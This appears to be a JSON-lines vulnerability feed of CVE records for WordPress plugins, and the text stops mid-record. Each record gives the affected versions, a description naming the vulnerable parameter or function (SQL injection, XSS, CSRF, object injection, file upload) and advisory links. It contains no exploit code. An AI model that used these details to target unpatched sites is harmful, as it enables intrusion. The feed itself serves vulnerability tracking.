{"CVE_ID":"CVE-2023-28659","slug":"waiting","versionImpact":"0.6.2","description":"The Waiting: One-click Countdowns WordPress Plugin, version <= 0.6.2, is affected by an authenticated SQL injection vulnerability in the pbc_down[meta][id] parameter of the pbc_save_downs action.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1169","slug":"ooohboi-steroids-for-elementor","versionImpact":"2.1.4","description":"The OoohBoi Steroids for Elementor plugin for WordPress is vulnerable to missing authorization due to a missing capability check on the 'file_uploader_callback' function in versions up to, and including, 2.1.4. This makes it possible for subscriber-level attackers to upload image attachments to the site.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ooohboi-steroids-for-elementor\\\/tags\\\/2.1.3\\\/inc\\\/exopite-simple-options\\\/upload-class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ooohboi-steroids-for-elementor\\\/tags\\\/2.1.3\\\/inc\\\/exopite-simple-options\\\/upload-class.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c56ed896-9267-49e6-a207-fe5362fe18cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c56ed896-9267-49e6-a207-fe5362fe18cd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2888622\\\/ooohboi-steroids-for-elementor\\\/tags\\\/2.1.5\\\/inc\\\/exopite-simple-options\\\/upload-class.php?old=2874981&old_path=ooohboi-steroids-for-elementor%2Ftags%2F2.1.4%2Finc%2Fexopite-simple-options%2Fupload-class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2888622\\\/ooohboi-steroids-for-elementor\\\/tags\\\/2.1.5\\\/inc\\\/exopite-simple-options\\\/upload-class.php?old=2874981&old_path=ooohboi-steroids-for-elementor%2Ftags%2F2.1.4%2Finc%2Fexopite-simple-options%2Fupload-class.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3343","slug":"user-registration","versionImpact":"3.0.1","description":"The User Registration plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 3.0.1 via deserialization of untrusted input from the 'profile-pic-url' parameter. This allows authenticated attackers, with subscriber-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/3.0.1\\\/includes\\\/functions-ur-core.php#L3156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/3.0.1\\\/includes\\\/functions-ur-core.php#L3156\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2932199\\\/user-registration\\\/trunk\\\/includes\\\/functions-ur-core.php#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2932199\\\/user-registration\\\/trunk\\\/includes\\\/functions-ur-core.php#file0\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3590277a-3319-4707-b728-d75ea59e8ad9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3590277a-3319-4707-b728-d75ea59e8ad9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4858","slug":"simple-table-manager","versionImpact":"1.5.6","description":"The Simple Table Manager WordPress plugin through 1.5.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/nightcloudos\\\/bug_report\\\/blob\\\/main\\\/vendors\\\/poc2.md\",\"name\":\"https:\\\/\\\/github.com\\\/nightcloudos\\\/bug_report\\\/blob\\\/main\\\/vendors\\\/poc2.md\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ef8029e0-9282-401a-a77d-10b6656adaa6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ef8029e0-9282-401a-a77d-10b6656adaa6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1038","slug":"beaver-builder-lite-version","versionImpact":"2.7.4.2","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to DOM-Based Reflected Cross-Site Scripting via a 'playground.wordpress.net' parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2cc2776-9496-42b5-a242-c572ae5462fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2cc2776-9496-42b5-a242-c572ae5462fb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/js\\\/fl-builder.js#L1578\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/js\\\/fl-builder.js#L1578\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032809\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.3\\\/js\\\/fl-builder.js?old=3012561&old_path=beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/js\\\/fl-builder.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032809\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.3\\\/js\\\/fl-builder.js?old=3012561&old_path=beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/js\\\/fl-builder.js\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6956","slug":"easyazon","versionImpact":"5.1.0","description":"The EasyAzon \u2013 Amazon Associates Affiliate Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018easyazon-cloaking-locale\u2019 parameter in all versions up to, and including, 5.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d13454c-0c46-4b16-8e0e-bbfcf2338230?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d13454c-0c46-4b16-8e0e-bbfcf2338230?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easyazon\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easyazon\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8916","slug":"suki-sites-import","versionImpact":"1.2.1","description":"The Suki Sites Import plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c6dd146-a99e-4317-a703-de34735317c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c6dd146-a99e-4317-a703-de34735317c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/suki-sites-import\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/suki-sites-import\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0393","slug":"royal-elementor-addons","versionImpact":"1.7.1006","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7.1006. This is due to missing or incorrect nonce validation on the wpr_filter_grid_posts() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1006\\\/classes\\\/modules\\\/wpr-filter-grid-posts.php#L1260\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1006\\\/classes\\\/modules\\\/wpr-filter-grid-posts.php#L1260\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1006\\\/classes\\\/modules\\\/wpr-filter-grid-posts.php#L391\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1006\\\/classes\\\/modules\\\/wpr-filter-grid-posts.php#L391\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220959\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220959\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/royal-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/royal-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8e34c05-7431-4acd-91f3-aab5e66f61ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8e34c05-7431-4acd-91f3-aab5e66f61ad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0861","slug":"vr-frases","versionImpact":"3.0.1","description":"The VR-Frases (collect & share quotes) plugin for WordPress is vulnerable to SQL Injection via several parameters in all versions up to, and including, 3.0.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/vr-frases\\\/tags\\\/3.0.1\\\/includes\\\/vr-frases-admin.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/vr-frases\\\/tags\\\/3.0.1\\\/includes\\\/vr-frases-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d9d5afb-d38d-442c-8511-f1683739a1da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d9d5afb-d38d-442c-8511-f1683739a1da?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32569","slug":"posts-table-filterable","versionImpact":"1.0.4","description":"Deserialization of Untrusted Data vulnerability in RealMag777 TableOn \u2013 WordPress Posts Table Filterable allows Object Injection. This issue affects TableOn \u2013 WordPress Posts Table Filterable: from n\/a through 1.0.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/posts-table-filterable\\\/vulnerability\\\/wordpress-tableon-plugin-1-0-2-php-object-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/posts-table-filterable\\\/vulnerability\\\/wordpress-tableon-plugin-1-0-2-php-object-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1454","slug":"ninja-page-categories-and-tags","versionImpact":"1.4.2","description":"The Ninja Pages WordPress plugin through 1.4.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0089f813-82fa-4ffc-acd6-a70e67edc8ea\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0089f813-82fa-4ffc-acd6-a70e67edc8ea\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-53270","slug":"easy-sticky-sidebar","versionImpact":"1.6.9","description":"Cross-Site Request Forgery (CSRF) vulnerability in Blend Media WordPress CTA allows Cross Site Request Forgery. This issue affects WordPress CTA: from n\/a through 1.6.9.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-sticky-sidebar\\\/vulnerability\\\/wordpress-cta-plugin-1-6-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-sticky-sidebar\\\/vulnerability\\\/wordpress-cta-plugin-1-6-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3669","slug":"supreme-addons-for-beaver-builder-lite","versionImpact":"1.0.9","description":"The Supreme Addons for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's auto_qrcodesabb shortcode in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-addons-for-beaver-builder-lite\\\/tags\\\/1.0.9\\\/modules\\\/QR-Code\\\/QR-Code.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-addons-for-beaver-builder-lite\\\/tags\\\/1.0.9\\\/modules\\\/QR-Code\\\/QR-Code.php#L102\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/supreme-addons-for-beaver-builder-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/supreme-addons-for-beaver-builder-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/904ba3ec-efde-424c-a50b-2ce71ad91ca5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/904ba3ec-efde-424c-a50b-2ce71ad91ca5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-26008","slug":"top-10","versionImpact":"3.2.4","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Ajay D'Souza Top 10 \u2013 Popular posts plugin for WordPress plugin <= 3.2.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/top-10\\\/wordpress-top-10-plugin-3-2-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/top-10\\\/wordpress-top-10-plugin-3-2-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2498","slug":"go_pricing","versionImpact":"3.3.19","description":"The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 3.3.19 due to insufficient input sanitization and output escaping. This makes it possible for contributor-level attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c3d4c96-63a7-4f3b-a9ac-095be241f840?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c3d4c96-63a7-4f3b-a9ac-095be241f840?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1016","slug":"intuitive-custom-post-order","versionImpact":"3.1.3","description":"The Intuitive Custom Post Order plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.1.3, due to insufficient escaping on the user supplied 'objects' and 'tags' parameters and lack of sufficient preparation in the 'update_options' function as well as the 'refresh' function which runs queries on the same values. This allows authenticated attackers, with administrator permissions, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Note that this attack may only be practical on configurations where it is possible to bypass addslashes due to the database using a nonstandard character set such as GBK.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc878508-200d-4bc7-aa99-c34e63cba4b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc878508-200d-4bc7-aa99-c34e63cba4b3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intuitive-custom-post-order\\\/trunk\\\/intuitive-custom-post-order.php?rev=2530122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intuitive-custom-post-order\\\/trunk\\\/intuitive-custom-post-order.php?rev=2530122\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3342","slug":"user-registration","versionImpact":"3.0.2","description":"The User Registration plugin for WordPress is vulnerable to arbitrary file uploads due to a hardcoded encryption key and missing file type validation on the 'ur_upload_profile_pic' function in versions up to, and including, 3.0.2. This makes it possible for authenticated attackers with subscriber-level capabilities or above to upload arbitrary files on the affected site's server which may make remote code execution possible. This was partially patched in version 3.0.2 and fully patched in version 3.0.2.1.","refs":"[{\"url\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/c0a58dff-7a5b-4cc0-82d6-2255e61d801c\\\/\",\"name\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/c0a58dff-7a5b-4cc0-82d6-2255e61d801c\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/3.0.1\\\/includes\\\/functions-ur-core.php#L3156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/3.0.1\\\/includes\\\/functions-ur-core.php#L3156\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a979e885-f7dd-4616-a881-64f3d97c309d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a979e885-f7dd-4616-a881-64f3d97c309d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2933689\\\/user-registration\\\/trunk\\\/includes\\\/functions-ur-core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2933689\\\/user-registration\\\/trunk\\\/includes\\\/functions-ur-core.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1341","slug":"advanced-iframe","versionImpact":"2024.1","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's advanced_iframe shortcode in all versions up to, and including, 2024.1 due to the plugin allowing users to include JS files from external sources through the additional_js attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/699e5c80-8a11-4f67-8b17-41170d9c6411?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/699e5c80-8a11-4f67-8b17-41170d9c6411?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042304%40advanced-iframe&new=3042304%40advanced-iframe&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042304%40advanced-iframe&new=3042304%40advanced-iframe&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0976","slug":"wp-event-manager","versionImpact":"3.1.41","description":"The WP Event Manager \u2013 Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the plugin parameter in all versions up to, and including, 3.1.41 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d7f4d17-8318-4ab3-b4a2-81d7a017c397?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d7f4d17-8318-4ab3-b4a2-81d7a017c397?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-manager\\\/trunk\\\/admin\\\/wp-event-manager-shortcode-list.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-manager\\\/trunk\\\/admin\\\/wp-event-manager-shortcode-list.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039683\\\/wp-event-manager\\\/trunk\\\/admin\\\/wp-event-manager-shortcode-list.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039683\\\/wp-event-manager\\\/trunk\\\/admin\\\/wp-event-manager-shortcode-list.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5226","slug":"fuse-social-floating-sidebar","versionImpact":"5.4.10","description":"The Fuse Social Floating Sidebar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the file upload functionality in all versions up to, and including, 5.4.10 due to insufficient validation of SVG files. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a3137a1-8e46-44c6-8edd-ad9fc4d66e0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a3137a1-8e46-44c6-8edd-ad9fc4d66e0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fuse-social-floating-sidebar\\\/tags\\\/5.4.10\\\/framework\\\/redux-core\\\/inc\\\/extensions\\\/custom_fonts\\\/class-redux-extension-custom-fonts.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fuse-social-floating-sidebar\\\/tags\\\/5.4.10\\\/framework\\\/redux-core\\\/inc\\\/extensions\\\/custom_fonts\\\/class-redux-extension-custom-fonts.php#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131828\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131828\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fuse-social-floating-sidebar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fuse-social-floating-sidebar\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7918","slug":"pocket-widget","versionImpact":"0.1.3","description":"The Pocket Widget WordPress plugin through 0.1.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1697646-1090-4a2b-9987-cec07428378e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1697646-1090-4a2b-9987-cec07428378e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8505","slug":"ajax-load-more","versionImpact":"7.1.2","description":"The WordPress Infinite Scroll \u2013 Ajax Load More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018button_label\u2019 parameter in all versions up to, and including, 7.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca29158a-ca60-46c7-93a5-bcf76e7666e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca29158a-ca60-46c7-93a5-bcf76e7666e4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-load-more\\\/trunk\\\/core\\\/classes\\\/class-alm-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-load-more\\\/trunk\\\/core\\\/classes\\\/class-alm-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ajax-load-more\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ajax-load-more\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160896\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160896\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8790","slug":"social-share-with-floating-bar","versionImpact":"1.0.3","description":"The Social Share With Floating Bar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 